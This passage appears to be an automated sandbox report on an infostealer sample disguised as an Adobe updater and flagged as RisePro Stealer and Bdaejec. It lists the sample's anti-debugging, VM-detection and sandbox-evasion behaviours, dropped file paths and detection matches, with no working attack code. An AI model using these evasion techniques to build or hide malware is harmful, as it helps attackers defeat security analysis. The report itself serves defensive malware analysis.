Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7508	Thread sleep count: 113 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7508	Thread sleep time: -226113s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7516	Thread sleep count: 112 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7516	Thread sleep time: -224112s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7656	Thread sleep time: -32000s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7432	Thread sleep count: 1574 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7432	Thread sleep time: -157400s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7728	Thread sleep count: 1116 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7564	Thread sleep count: 93 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7564	Thread sleep time: -186093s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7540	Thread sleep count: 91 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7540	Thread sleep time: -182091s >= -30000s	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7556	Thread sleep count: 118 > 30	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7556	Thread sleep time: -236118s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7896	Thread sleep time: -48024s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7868	Thread sleep count: 1138 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7868	Thread sleep time: -2277138s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7852	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7852	Thread sleep count: 462 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7852	Thread sleep time: -46200s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8072	Thread sleep count: 208 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7872	Thread sleep count: 1071 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7872	Thread sleep time: -2143071s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8072	Thread sleep count: 245 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7884	Thread sleep count: 1233 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7884	Thread sleep time: -2467233s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7892	Thread sleep count: 1244 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 7892	Thread sleep time: -2489244s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 6592	Thread sleep count: 366 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 6592	Thread sleep time: -732366s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 6564	Thread sleep count: 369 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 6564	Thread sleep time: -738369s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8108	Thread sleep count: 62 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8184	Thread sleep count: 322 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8184	Thread sleep time: -644322s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8108	Thread sleep count: 478 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8108	Thread sleep time: -47800s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 1196	Thread sleep count: 221 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 1196	Thread sleep count: 254 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8172	Thread sleep count: 5627 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 8172	Thread sleep time: -11259627s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Last function: Thread delayed
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Code function: 1_2_004E1718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 004E1754h		1_2_004E1718
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Code function: 15_2_00E31718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00E31754h		15_2_00E31718

Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Code function: 1_2_004E29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,		1_2_004E29E2
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	Code function: 15_2_00E329E2 wsprintfA,Sleep,memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,		15_2_00E329E2

Source: C:\Users\user\AppData\Local\Temp\xRp.exe

Code function: 1_2_004E2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

1_2_004E2B8C

Source: C:\Users\user\AppData\Local\Temp\xRp.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xRp.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Source: Amcache.hve.1.dr	Binary or memory string: VMware
Source: MPGPH131.exe, 0000000A.00000002.4130977280.000000000122A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}G
Source: RageMP131.exe, 0000000C.00000002.4131081947.0000000001163000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}%
Source: Amcache.hve.1.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: xRp.exe, 00000001.00000002.1856041634.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 00000001.00000002.1856041634.00000000008FD000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 00000001.00000003.1666399765.00000000008FD000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000002.2058481763.0000000000858000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000002.2058481763.00000000008A4000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000003.1903569689.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000003.1903569689.000000000089B000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000002.2058481763.00000000008DA000.00000004.00000020.00020000.00000000.sdmp, xRp.exe, 0000000F.00000003.1903569689.000000000086B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: RageMP131.exe, 0000000C.00000002.4131081947.0000000001163000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_ADC2C92C@
Source: xRp.exe, 00000001.00000002.1856041634.0000000000898000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBn
Source: RageMP131.exe, 0000000E.00000003.1932359477.0000000001177000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.1.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: AdobeUpdaterV131.exe, 00000000.00000003.1712286461.00000000011BF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}0
Source: AdobeUpdaterV131.exe, 00000000.00000002.4131093873.00000000011AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&[
Source: RageMP131.exe, 0000000E.00000002.4131139448.0000000001165000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
Source: RageMP131.exe, 0000000E.00000002.4131139448.0000000001165000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
Source: MPGPH131.exe, 00000009.00000002.4130830762.0000000001490000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.1.dr	Binary or memory string: vmci.sys
Source: AdobeUpdaterV131.exe, 00000000.00000002.4131093873.00000000011AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: MPGPH131.exe, 0000000A.00000002.4126911712.00000000005CD000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}d
Source: RageMP131.exe, 0000000C.00000002.4131081947.0000000001163000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_ADC2C92C
Source: AdobeUpdaterV131.exe, 00000000.00000002.4131093873.000000000117D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}^
Source: Amcache.hve.1.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.1.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.1.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.1.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.1.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.1.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: xRp.exe, 0000000F.00000002.2058481763.00000000008A4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: Amcache.hve.1.dr	Binary or memory string: VMware VMCI Bus Device
Source: MPGPH131.exe, 00000009.00000002.4130830762.000000000145D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}S
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.1.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: AdobeUpdaterV131.exe, 00000000.00000003.1712286461.00000000011BF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}y
Source: AdobeUpdaterV131.exe, 00000000.00000002.4130747747.0000000000F5C000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}L
Source: Amcache.hve.1.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: RageMP131.exe, RageMP131.exe, 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual USB Mouse
Source: AdobeUpdaterV131.exe, 00000000.00000002.4131093873.00000000011AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll[
Source: Amcache.hve.1.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.1.dr	Binary or memory string: VMware, Inc.
Source: RageMP131.exe, 0000000E.00000002.4131139448.0000000001138000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: MPGPH131.exe, 00000009.00000002.4130830762.0000000001490000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM
Source: Amcache.hve.1.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.1.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.1.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: RageMP131.exe, 0000000C.00000002.4131081947.0000000001163000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\|
Source: Amcache.hve.1.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: MPGPH131.exe, 00000009.00000003.1759337474.00000000014A3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}.AVJ
Source: Amcache.hve.1.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.1.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: MPGPH131.exe, 0000000A.00000002.4130977280.000000000124D000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000C.00000002.4131081947.0000000001151000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: AdobeUpdaterV131.exe, 00000000.00000002.4131093873.00000000011BF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_ADC2C92C0
Source: Amcache.hve.1.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.1.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.1.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.1.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: AdobeUpdaterV131.exe, 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmp, MPGPH131.exe, 0000000A.00000002.4128506607.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmp, RageMP131.exe, 0000000C.00000002.4128039847.000000000087B000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\AppData\Local\Temp\xRp.exe

API call chain: ExitProcess graph end node

graph_1-1049

Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Thread information set: HideFromDebugger	Jump to behavior

Potentially malicious time measurement code found

Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 10_2_04FB008C Start: 04FB00B5 End: 04FB005C		10_2_04FB008C
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 14_2_05140442 Start: 051407BF End: 0514045E		14_2_05140442

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe

Code function: 0_2_04F1074F rdtsc

0_2_04F1074F

Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Code function: 0_2_00BC0044 mov eax, dword ptr fs:[00000030h]	0_2_00BC0044
Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Code function: 0_2_00634560 mov eax, dword ptr fs:[00000030h]	0_2_00634560
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 9_2_01050044 mov eax, dword ptr fs:[00000030h]	9_2_01050044
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 9_2_00AC4560 mov eax, dword ptr fs:[00000030h]	9_2_00AC4560
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 10_2_01050044 mov eax, dword ptr fs:[00000030h]	10_2_01050044
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: 10_2_00AC4560 mov eax, dword ptr fs:[00000030h]	10_2_00AC4560
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 12_2_00B60044 mov eax, dword ptr fs:[00000030h]	12_2_00B60044
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 12_2_005D4560 mov eax, dword ptr fs:[00000030h]	12_2_005D4560
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 14_2_00B60044 mov eax, dword ptr fs:[00000030h]	14_2_00B60044
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Code function: 14_2_005D4560 mov eax, dword ptr fs:[00000030h]	14_2_005D4560

Source: C:\Users\user\AppData\Local\Temp\xRp.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\0be11806.bat" "

Jump to behavior

Source: SciTE.exe.1.dr	Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
Source: AdobeUpdaterV131.exe, AdobeUpdaterV131.exe, 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmp, RageMP131.exe, RageMP131.exe, 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: um72Program Manager
Source: AdobeUpdaterV131.exe, 00000000.00000002.4127836747.00000000008DB000.00000040.00000001.01000000.00000003.sdmp, RageMP131.exe, 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: oum72Program Manager

Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe

Code function: 0_2_006FBF8B GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

0_2_006FBF8B

Source: C:\Users\user\AppData\Local\Temp\xRp.exe

Code function: 1_2_004E139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,

1_2_004E139F

Source: C:\Users\user\Desktop\AdobeUpdaterV131.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.1.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.1.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Bdaejec

Source: Yara match	File source: Process Memory Space: xRp.exe PID: 6568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xRp.exe PID: 8120, type: MEMORYSTR

Yara detected RisePro Stealer

Source: Yara match	File source: 0000000C.00000002.4126981590.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.1743345459.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1907814686.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4126912909.0000000000621000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1823053506.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1743597679.0000000005370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1682921279.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
